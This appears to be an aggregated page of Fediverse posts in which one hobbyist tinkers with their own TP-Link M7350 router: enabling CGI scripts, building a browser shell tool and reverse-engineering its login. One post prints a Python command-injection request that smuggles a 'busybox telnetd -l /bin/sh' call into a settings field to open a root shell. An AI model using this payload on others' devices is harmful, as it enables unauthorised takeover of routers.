#m7350 — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #m7350, aggregated by home.social.
-
Lets write a lil tool,
so we don't need to use #telnet anymore
https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser
And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.
Without any command line. In the #webbrowser .
❤️ Lovely
Whats that ?
If you copy in a sh onto your router externalSD ?
..
Sure. added a FixPermission button just for that. :abloblamp:
I like #CgiBin . Is nice
(I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )
#repost •acws #acws #m7350 #tplink -
Well turns out we can do without #php
Router hates #https connections, so we need to rewrite the entire uptime thing
(Furthermore -spider https is always retruning 404, but router is on, so yea.)
https://codeberg.org/alceawisteria/UptimeMonitor/src/branch/main/sh_ver
But it works.
Now I only need to figure out how to do #cron .
And I'm done.
Guess I'll be writing some customized *sh for it then.
That was *not* on my 2026 Bingo card.
(Note to self, check #GLIBC version on future routers, so you know what it can actually run !)
#repost •acws #acws #m7350 #tplink -
How very.. #odd
After a slight #lighhttpd change
----------------
server.modules = (
/ # # Uncomment the CGI assignment line
/ # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
/ # grep -n "cgi.assign" /etc/lighttpd.conf
141: cgi.assign = ( "" => "" )
144: cgi.assign = ( "" => "" )
248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
/
-------------
and rebooting the #m7350 now #telnet will not renable again with the script.
Whats even weirder.
qcmap_web_cgi throws a 404..
I'm eternally confused
We still get a token no problemo, but somehow telnet is now closed and stays ?
(Why would a router reboot or slight lighttpd change cause this ?)
Should've enabled #adb while I had the chance haha.
Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
And even #perl has issues Ohwell
C:\Users\User>python -c "import requests; r=requests.post('http://192.168.0.1/qcmap_web_cgi', json={'token':'WPL3qTwBJ8YSmbz1','module':'webServer','action':1,'language':'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie':'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
<string>:1: SyntaxWarning: invalid escape sequence '\$'
404 <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>404 - Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
</body>
</html>
#repost •acws #acws -
So you are trying to tell me that noone bothered to archive these #entware files
1592
phodav_2.5-1_armv7-3.2.ipk 18-Apr-2021 13:23 28453
php7-cgi_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1507945
php7-cli_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1527762
php7-fastcgi_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 786
php7-fpm_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1562752
php7-mod-bcmath_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 12214
php7-mod-calendar_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 10578
php7-mod-ctype_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 3104
php7-mod-curl_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 33116
php7-mod-dom_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 45322
php7-mod-exif_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 27343
php7-mod-fileinfo_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 401782
php7-mod-filter_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 15741
php7-mod-ftp_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 17577
php7-mod-gd_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 26089
php7-mod-gettext_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 4391
and now they are Gone ???
What is the #IT community even doing anyways ?
https://web.archive.org/web/20210613113743/https://bin.entware.net/armv7sf-k3.2/
Now I can't get a 2.2.7 GLIBC to be able to use #php 8
And I cannot get a #php7 which might just be compatible with my old one as there is no backup on da whole. wide. web
A
Ma
Zing.
:blobcatnotlike:
#repost •acws #acws #m7350 #tplink -
Say what you will about #Deepseek , but for #hacking it can be useful.
It is quite dumb and you have to hand hold it a bit, but..
#Selenium + #API call reverse engineering and I can login to my dumb #TPLink router via #sh now.
I wonder if I could reboot it from shell or even read out its microSD capacity left...
Hmmmm......
I don't see much else use for #AI tho tbh.
#Art ? Get outta here.
#Movies ? Get lost.
#Cloning #Voice actors and deprive them of their living ? Are you lost ?
Anyways.
It is always the same with humans misusing tools ...
At least this is now abit more useful than my past attempts especially as dumb #TPLink closed #telnet in that latest update.
I'll hack this thing to bits if I must... :angry_cirno:
(Altho the thing I wanted the most. Accessing #sftp from #webbrowser via a simple php is already possible... )
I mean I feel sorry for the people who think #ArtificialIntelligence (emphasis on artificial) is #coding or anything near it.
I started with js and ahk in like 2007. Added #php when js needed handholding and only arrived at #python when a companies security guidelines barred #ahk (as keylogger lol)
So yeah.
But poor people.. Poor pooor people.
And I do catch myself sometimes thinking "yeah lets toss this trash into multiple LLMs to see what they get.
Sometimes I bounce the ideas between them or restart sessions as sometimes they have ideas you can't finde with #searchengines.
Imo LLMs are search engines.
Nothing more. Nothing less.
Very dumb, but vast in data.
#repost •acws #acws #M7350